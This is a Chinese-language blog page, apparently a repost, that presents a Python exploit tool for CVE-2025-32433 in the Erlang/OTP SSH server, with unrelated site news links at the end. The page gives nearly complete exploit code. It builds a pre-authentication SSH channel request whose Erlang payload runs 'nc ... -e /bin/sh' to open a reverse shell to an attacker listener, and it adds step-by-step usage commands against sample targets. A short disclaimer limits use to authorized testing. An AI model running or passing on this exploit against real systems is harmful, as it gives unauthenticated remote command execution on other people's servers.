一键利用Erlang SSH高危漏洞获取反向Shell
CVE-2025-32433 Erlang SSH 漏洞利用工具项目描述这是一个针对CVE-2025-32433漏洞的Python自动化利用脚本。该漏洞存在于Erlang/OTP的SSH服务器库中影响OTP-27.3.3、OTP-26.2.5.11和OTP-25.3.2.20之前的版本。攻击者可以利用此漏洞在无需有效凭证的情况下执行任意命令获得未经授权的系统访问权限。本项目提供了一个完整的利用工具通过发送特制的预认证SSH通道请求触发Erlang RCE载荷并建立反向Shell连接。功能特性自动化攻击流程: 自动处理SSH协议握手、通道建立和载荷发送全过程灵活的参数配置: 支持自定义攻击机和目标机的IP地址与端口Erlang RCE载荷: 利用os:cmd函数执行Netcat命令建立反向Shell详细的日志输出: 提供每个攻击阶段的实时状态反馈协议级封装: 正确实现SSH消息格式、填充和长度编码异常处理: 包含完善的错误捕获和连接超时机制命令行友好: 使用argparse库提供清晰的帮助信息和参数验证安装指南系统要求Python 3.6 或更高版本网络连接权限用于连接目标SSH服务攻击机上需要运行Netcat监听器安装步骤克隆或下载脚本gitclonerepository-url# 或直接下载 CVE-2025-32433.py 文件确保Python环境可用python3 --version无需额外依赖脚本仅使用Python标准库argparse、socket、struct、time、sys使用说明基本使用流程启动Netcat监听器在攻击机上nc-lvnp4444运行漏洞利用脚本python3 CVE-2025-32433.py -lh192.168.1.100 -lp4444-rh10.0.0.5 -rp22等待Shell连接如果目标系统易受攻击反向Shell将连接到您的监听器参数详解参数简写必选默认值描述--lhost-lh是-接收反向Shell的本地IP地址--lport-lp是-接收反向Shell的本地端口--rhost-rh否10.10.10.10目标SSH服务器IP地址--rport-rp否22目标SSH服务器端口--help-h否-显示帮助信息使用示例攻击内网目标:python3 CVE-2025-32433.py -lh192.168.1.100 -lp4444-rh192.168.1.50攻击自定义端口:python3 CVE-2025-32433.py -lh10.0.0.2 -lp5555-rh vulnerable.com -rp2222核心代码1. 参数解析模块defparse_args():parserargparse.ArgumentParser(descriptionCTF exploit: send a pre-auth SSH channel request with an Erlang RCE payload to get a reverse shell)parser.add_argument(-lh,--lhost,requiredTrue,helpLocal host/IP to receive the reverse shell)parser.add_argument(-lp,--lport,typeint,requiredTrue,helpLocal port to receive the reverse shell)parser.add_argument(-rh,--rhost,default10.10.10.10,helpTarget SSH server IP (default: 10.10.10.10))parser.add_argument(-rp,--rport,typeint,default22,helpTarget SSH server port (default: 22))returnparser.parse_args()代码说明使用argparse库定义命令行参数包括必需的本地监听地址/端口和可选的目标地址/端口提供清晰的帮助信息。2. SSH消息构造模块defstring_payload(s:str)-bytes:bs.encode(utf-8)returnstruct.pack(I,len(b))bdefbuild_channel_request(channel_id:int,lhost:str,lport:int)-bytes:# Erlang RCE payload using netcat; trailing period is requiredpayloadfos:cmd(nc{lhost}{lport}-e /bin/sh).return(b\x62# SSH_MSG_CHANNEL_REQUESTstruct.pack(I,channel_id)string_payload(exec)b\x01# want_reply Truestring_payload(payload))代码说明构建SSH协议消息其中关键部分是生成Erlang RCE载荷通过os:cmd函数执行Netcat命令建立反向Shell注意末尾的句点是Erlang语法要求。3. SSH数据包封装模块defpad_packet(pkt:bytes,block_size:int8)-bytes:min_pad4pad_lenblock_size-((len(pkt)5)%block_size)ifpad_lenmin_pad:pad_lenblock_size total_lenlen(pkt)1pad_lenreturnstruct.pack(I,total_len)bytes([pad_len])pktb\x00*pad_len代码说明实现SSH协议的数据包填充机制计算正确的填充长度以确保数据包符合SSH协议规范包括总长度、填充长度和实际内容。4. 主攻击逻辑模块defmain():argsparse_args()print(f[*] Target:{args.rhost}:{args.rport})print(f[*] Listener:{args.lhost}:{args.lport})try:withsocket.create_connection((args.rhost,args.rport),timeout5)ass:print([*] Connected. Exchanging banner...)s.sendall(bSSH-2.0-OpenSSH_8.9\r\n)banners.recv(1024)print(f[] Banner:{banner.strip().decode(errorsignore)})time.sleep(0.3)print([*] Sending fake KEXINIT...)s.sendall(pad_packet(build_kexinit()))time.sleep(0.3)print([*] Opening channel...)s.sendall(pad_packet(build_channel_open()))time.sleep(0.3)print([*] Sending exec request with Erlang reverse-shell payload...)reqbuild_channel_request(0,args.lhost,args.lport)s.sendall(pad_packet(req))print([✓] Payload sent. If the server is vulnerable, check your listener now.)exceptExceptionase:print(f[!] Exploit failed:{e})sys.exit(1)代码说明主攻击流程建立TCP连接发送SSH横幅伪造密钥交换初始化打开SSH通道最后发送包含RCE载荷的通道请求每个步骤间有适当延迟以确保协议顺序。5. KEXINIT构造模块defbuild_kexinit()-bytes:cookieb\x00*16defnl(lst):returnstring_payload(,.join(lst))return(b\x14# SSH_MSG_KEXINITcookienl([curve25519-sha256,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,])nl([rsa-sha2-256,rsa-sha2-512])nl([aes128-ctr])*2nl([hmac-sha1])*2nl([none])*2nl([])*2b\x00# first_kex_packet_followsstruct.pack(I,0)# reserved)代码说明构造SSH密钥交换初始化消息定义支持的算法列表包括密钥交换算法、主机密钥算法、加密算法和MAC算法使用空cookie和适当的保留字段。免责声明: 本工具仅供教育、研究和授权安全测试使用。请仅对您拥有合法权限的系统进行测试。未经授权攻击他人系统是违法行为。FINISHED6HFtX5dABrKlqXeO5PUv/84SoIoTE3firf/5vX8AZ5ZLZ6sDpmKDPWlvvdwWfc更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

相关新闻

【计算机毕业设计案例】基于VUE的食堂智能点餐系统基于nodejs的药膳食堂点餐系统的设计与实现(程序+文档+讲解+定制)

【计算机毕业设计案例】基于VUE的食堂智能点餐系统基于nodejs的药膳食堂点餐系统的设计与实现(程序+文档+讲解+定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

2026/7/4 8:57:11 阅读更多 →
中国工业AI原生企业如何走向全球?出海策略与落地实践

中国工业AI原生企业如何走向全球?出海策略与落地实践

当越来越多企业把AI当作一个“插件”来用——比如加个智能质检模块、搭个预测性维护系统——我们其实离真正的智能化还很远。真正的工业AI原生企业,不是在现有流程上贴一层AI的皮,而是从根上重构了生产逻辑。它们不把AI看作辅助工具,而是视为…

2026/7/3 14:46:59 阅读更多 →
深度测评 9 个降AI率工具 千笔轻松降AIGC

深度测评 9 个降AI率工具 千笔轻松降AIGC

AI降重工具的崛起与研究生论文的救星 在当今学术研究日益依赖人工智能的时代,越来越多的研究生发现,使用AI工具撰写论文虽然提升了效率,却也带来了AIGC率过高、查重率不达标的问题。如何在保持原文语义和逻辑的前提下,有效降低AI痕…

2026/7/3 14:47:00 阅读更多 →

最新新闻

抖店AI标题优化怎么用标题违规和低质标题怎么改

抖店AI标题优化怎么用标题违规和低质标题怎么改

抖店AI标题优化怎么用?标题违规和低质标题怎么改 抖店商品标题写不好,会影响审核、搜索理解和买家点击。很多商家从 1688 搬标题时,原标题里带批发词、品牌词、极限词、无关热词,直接上架容易违规,也不一定适合抖店买家…

2026/7/5 4:29:15 阅读更多 →
如何3分钟完成通达信缠论插件部署:终极自动化分析指南

如何3分钟完成通达信缠论插件部署:终极自动化分析指南

如何3分钟完成通达信缠论插件部署:终极自动化分析指南 【免费下载链接】ChanlunX 缠中说禅炒股缠论可视化插件 项目地址: https://gitcode.com/gh_mirrors/ch/ChanlunX 还在为复杂的缠论分析而烦恼吗?面对繁琐的笔段划分和中枢识别,传…

2026/7/5 4:27:15 阅读更多 →
接口自动化测试项目框架详解

接口自动化测试项目框架详解

🍅 点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快 在选择接口测试自动化框架时,需要根据团队的技术栈和项目需求来综合考虑。对于测试团队来说,使用Python相关的测试框架更为便捷。无论选…

2026/7/5 4:25:15 阅读更多 →
单片机IWIP 原子云实验

单片机IWIP 原子云实验

单片机 :STM32F407 开发板:DMF407电机开发板 平台:keil V5.31HSE 为8MHZ HSI为16MHZ主函数int main(void) {HAL_Init(); /* 初始化HAL库 */sys_stm32_clock_init(336, 8, 2, 7); /* 设置时钟,168Mhz */delay_init…

2026/7/5 4:25:15 阅读更多 →
Nano Banana部署Gemini 2.5 Flash:ARM+NPU边缘多模态推理实战指南

Nano Banana部署Gemini 2.5 Flash:ARM+NPU边缘多模态推理实战指南

1. 项目概述:这不是一个“升级包”,而是一套可落地的嵌入式AI推理工作流 你手头有一块 Nano Banana 开发板——它不是树莓派,也不是 Jetson Nano,而是基于全志 H616 芯片、带双千兆网口、4GB LPDDR4、支持 PCIe 2.0 x1 的国产小钢…

2026/7/5 4:23:15 阅读更多 →
3分钟掌握Crontab UI:告别命令行恐惧的Linux定时任务可视化管理神器

3分钟掌握Crontab UI:告别命令行恐惧的Linux定时任务可视化管理神器

3分钟掌握Crontab UI:告别命令行恐惧的Linux定时任务可视化管理神器 【免费下载链接】crontab-ui Easy and safe way to manage your crontab file 项目地址: https://gitcode.com/gh_mirrors/cr/crontab-ui 还在为复杂的crontab语法而烦恼吗?Cro…

2026/7/5 4:19:14 阅读更多 →

日新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

月新闻